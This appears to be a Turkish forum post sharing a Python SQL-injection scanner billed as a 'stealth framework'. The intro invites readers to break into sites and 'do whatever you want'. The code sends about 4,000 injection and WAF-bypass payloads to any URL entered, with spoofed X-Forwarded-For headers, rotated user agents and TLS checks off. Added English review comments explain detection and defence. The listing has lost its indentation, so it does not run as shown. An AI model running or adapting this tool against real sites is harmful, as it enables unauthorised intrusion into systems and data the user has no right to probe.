

Kodda AI'dan yardım alındı. SQL açıklarını bulup oradan siteye istediğinizi yapın. İsteyen daha fazla method ekleyebilir. Bir e.s. alırım. İsteyen siber güvenlik için de kullanabilir.
Python:
import asyncio
import aiohttp
import random
import time
import os
import json
import warnings
import base64
from datetime import datetime
# Suppress DeprecationWarning output for the whole process.
warnings.filterwarnings("ignore", category=DeprecationWarning)
# Passed to aiohttp.TCPConnector(limit=...) in UltimateScanner.run(): upper bound
# on simultaneous connections opened by the client session.
MAX_CONCURRENT = 50
# Passed as timeout= to session.get() for every request (seconds).
TIMEOUT_SEC = 10
# ANSI escape sequences used to colour the console output; "RESET" restores the default.
COLORS = {"OK": "\033[92m", "FAIL": "\033[91m", "WARN": "\033[93m", "INFO": "\033[94m", "RESET": "\033[0m"}
# NOTE(review): the indentation of this listing was lost when it was pasted, so
# the file does not parse as shown. The nesting described in the comments below
# is inferred from statement order and must be confirmed against the original.
#
# Sends a fixed list of SQL-injection test strings to one target as the `id`
# query parameter and records each response whose body contains a database
# error keyword.
# What this looks like in server logs: one client issuing GET /?id=... requests
# whose query string carries quote characters, ORDER BY / UNION SELECT
# fragments and /**/ sequences, with a different X-Forwarded-For value and one
# of three fixed User-Agent strings on each request.
class UltimateScanner:
# Normalises the target: strips whitespace and a trailing "/", and prefixes
# "https://" when the value does not start with "http". Builds the payload
# list once and initialises the result list and the counters.
def __init__(self, target_url):
self.target = target_url.strip().rstrip('/')
if not self.target.startswith("http"):
self.target = "https://" + self.target
self.results = []
self.stats = {"total": 0, "vuln": 0, "error": 0}
self.payloads = self.generate_stealth_payloads()
def generate_stealth_payloads(self):
"""Payloads enriched with WAF-bypass techniques."""
# Eight base strings, each added in three spellings: as written, with spaces
# replaced by /**/, and with the quote and space percent-encoded.
base = ["'", "''", "';", '"', '";', "') OR 1=1--", "1' ORDER BY 1--", "1' UNION SELECT NULL--"]
expanded = []
for b in base:
expanded.append(b)
expanded.append(b.replace(" ", "/**/"))
expanded.append(b.replace("'", "%27").replace(" ", "%20"))
# For i = 1..1999: an ORDER BY i string and a UNION SELECT with min(i, 20)
# NULL columns, so the UNION string is identical for every i >= 20.
# NOTE(review): presumably this loop is not nested inside the loop over
# `base`; in that case the list holds 24 + 3998 = 4022 entries. Confirm.
# These are long-published probe patterns; signature rules and access logs
# keyed on the `id` parameter will show the complete run.
for i in range(1, 2000):
expanded.append(f"1' ORDER BY {i}--")
expanded.append(f"1' UNION SELECT {','.join(['NULL']*min(i, 20))}--")
return expanded
async def stealth_fetch(self, session, payload):
"""Stealth-oriented request sender."""
# Sends one GET to <target>/?id=<payload>, prints the status, and records
# the URL when the body contains one of the keywords in sql_errors.
headers = {
"User-Agent": random.choice([
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/121.0.0.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15",
"Mozilla/5.0 (X11; Linux x86_64) Firefox/122.0"
]),
# A random dotted quad per request. Only this client-supplied header changes;
# nothing here alters the address the connection is made from, so logging
# keyed on the socket peer address still attributes every request to one
# source. The header misleads only servers or proxies that trust
# X-Forwarded-For from arbitrary clients; accepting it solely from known
# proxies removes the effect.
"X-Forwarded-For": f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
"Referer": "https://www.google.com/"
}
# The payload is interpolated into the query string as-is.
test_url = f"{self.target}/?id={payload}"
self.stats["total"] += 1
curr_id = self.stats["total"]
try:
# ssl=False makes aiohttp skip TLS certificate verification for this request.
async with session.get(test_url, headers=headers, timeout=TIMEOUT_SEC, ssl=False, allow_redirects=True) as resp:
text = await resp.text()
status = resp.status
color = COLORS["OK"] if status == 200 else COLORS["WARN"]
print(f"[{curr_id:04}] {color}ATTACKING:{COLORS['RESET']} {payload[:25]:<25} | {color}CODE: {status}{COLORS['RESET']}")
# Plain substring test on the lower-cased body. Ordinary page content that
# mentions "mysql", "oracle" etc. matches as well, so an entry in
# self.results is a hint to investigate, not proof of injection.
# The check depends entirely on database error text reaching the client:
# generic error pages remove that signal, and parameterised queries remove
# the underlying flaw.
sql_errors = ["sql syntax", "mysql", "postgresql", "oracle", "sqlite", "unexpected end", "native client"]
if any(err in text.lower() for err in sql_errors):
print(f"\n{COLORS['FAIL']}[!!!] KRİTİK ZAFİYET TESPİT EDİLDİ! [!!!]{COLORS['RESET']}")
print(f"{COLORS['FAIL']}[TİP] SQL Injection{COLORS['RESET']}")
print(f"{COLORS['FAIL']}[URL] {test_url}{COLORS['RESET']}\n")
self.results.append({"url": test_url, "type": "SQLi", "time": str(datetime.now())})
self.stats["vuln"] += 1
# Every failure (timeout, connection error, decode error, ...) is only counted;
# the exception itself is discarded.
except Exception:
self.stats["error"] += 1
async def run(self):
# Clears the terminal with a fixed command string (no user input reaches os.system).
os.system('cls' if os.name == 'nt' else 'clear')
print(f"{COLORS['INFO']}=== ORION-X ULTIMATE STEALTH FRAMEWORK ==={COLORS['RESET']}")
print(f"[*] HEDEF SITE: {self.target}")
print(f"[*] PAYLOAD SAYISI: {len(self.payloads)}")
print(f"[*] GİZLİLİK MODU: AKTİF (X-Forwarded-For Spoofing)")
print(f"{'-'*50}\n")
# Blocking sleep inside a coroutine; nothing else is scheduled yet at this point.
time.sleep(1)
# One coroutine per payload is created up front and all are awaited together;
# the connector limit caps simultaneous connections at MAX_CONCURRENT. On the
# receiving side this is a burst of parallel connections from one client,
# the pattern per-client rate limiting is meant to catch.
conn = aiohttp.TCPConnector(limit=MAX_CONCURRENT, ssl=False)
async with aiohttp.ClientSession(connector=conn) as session:
tasks = [self.stealth_fetch(session, p) for p in self.payloads]
await asyncio.gather(*tasks)
self.summary()
def summary(self):
# Prints the counters (labels are Turkish: total attempts, findings,
# failed/blocked, report file) and writes self.results as JSON to
# scan_results.json in the current working directory, replacing any existing
# file. Each recorded URL contains the request string that was sent.
print(f"\n{COLORS['INFO']}{'='*50}{COLORS['RESET']}")
print(f"TARAMA SONUÇLARI")
print(f"Toplam Deneme: {self.stats['total']}")
print(f"Bulunan Açık : {self.stats['vuln']}")
print(f"Hatalı/Engelli: {self.stats['error']}")
print(f"Rapor : scan_results.json")
print(f"{COLORS['INFO']}{'='*50}{COLORS['RESET']}")
with open("scan_results.json", "w") as f:
json.dump(self.results, f, indent=4)
# Reads the target URL from stdin (the prompt is Turkish for "URL you want to
# scan"), builds an UltimateScanner for it and awaits its run().
# NOTE(review): the value is used exactly as typed; nothing here checks it
# against an agreed test scope or allow-list before requests are sent.
async def main():
target = input("Taramak istediğiniz URL: ")
scanner = UltimateScanner(target)
await scanner.run()
# Script entry point: runs main() on a new event loop. Ctrl-C is caught and
# answered with a Turkish "exiting" message instead of a traceback.
if __name__ == "__main__":
try:
asyncio.run(main())
except KeyboardInterrupt:
print("\n[!] Çıkış yapılıyor...")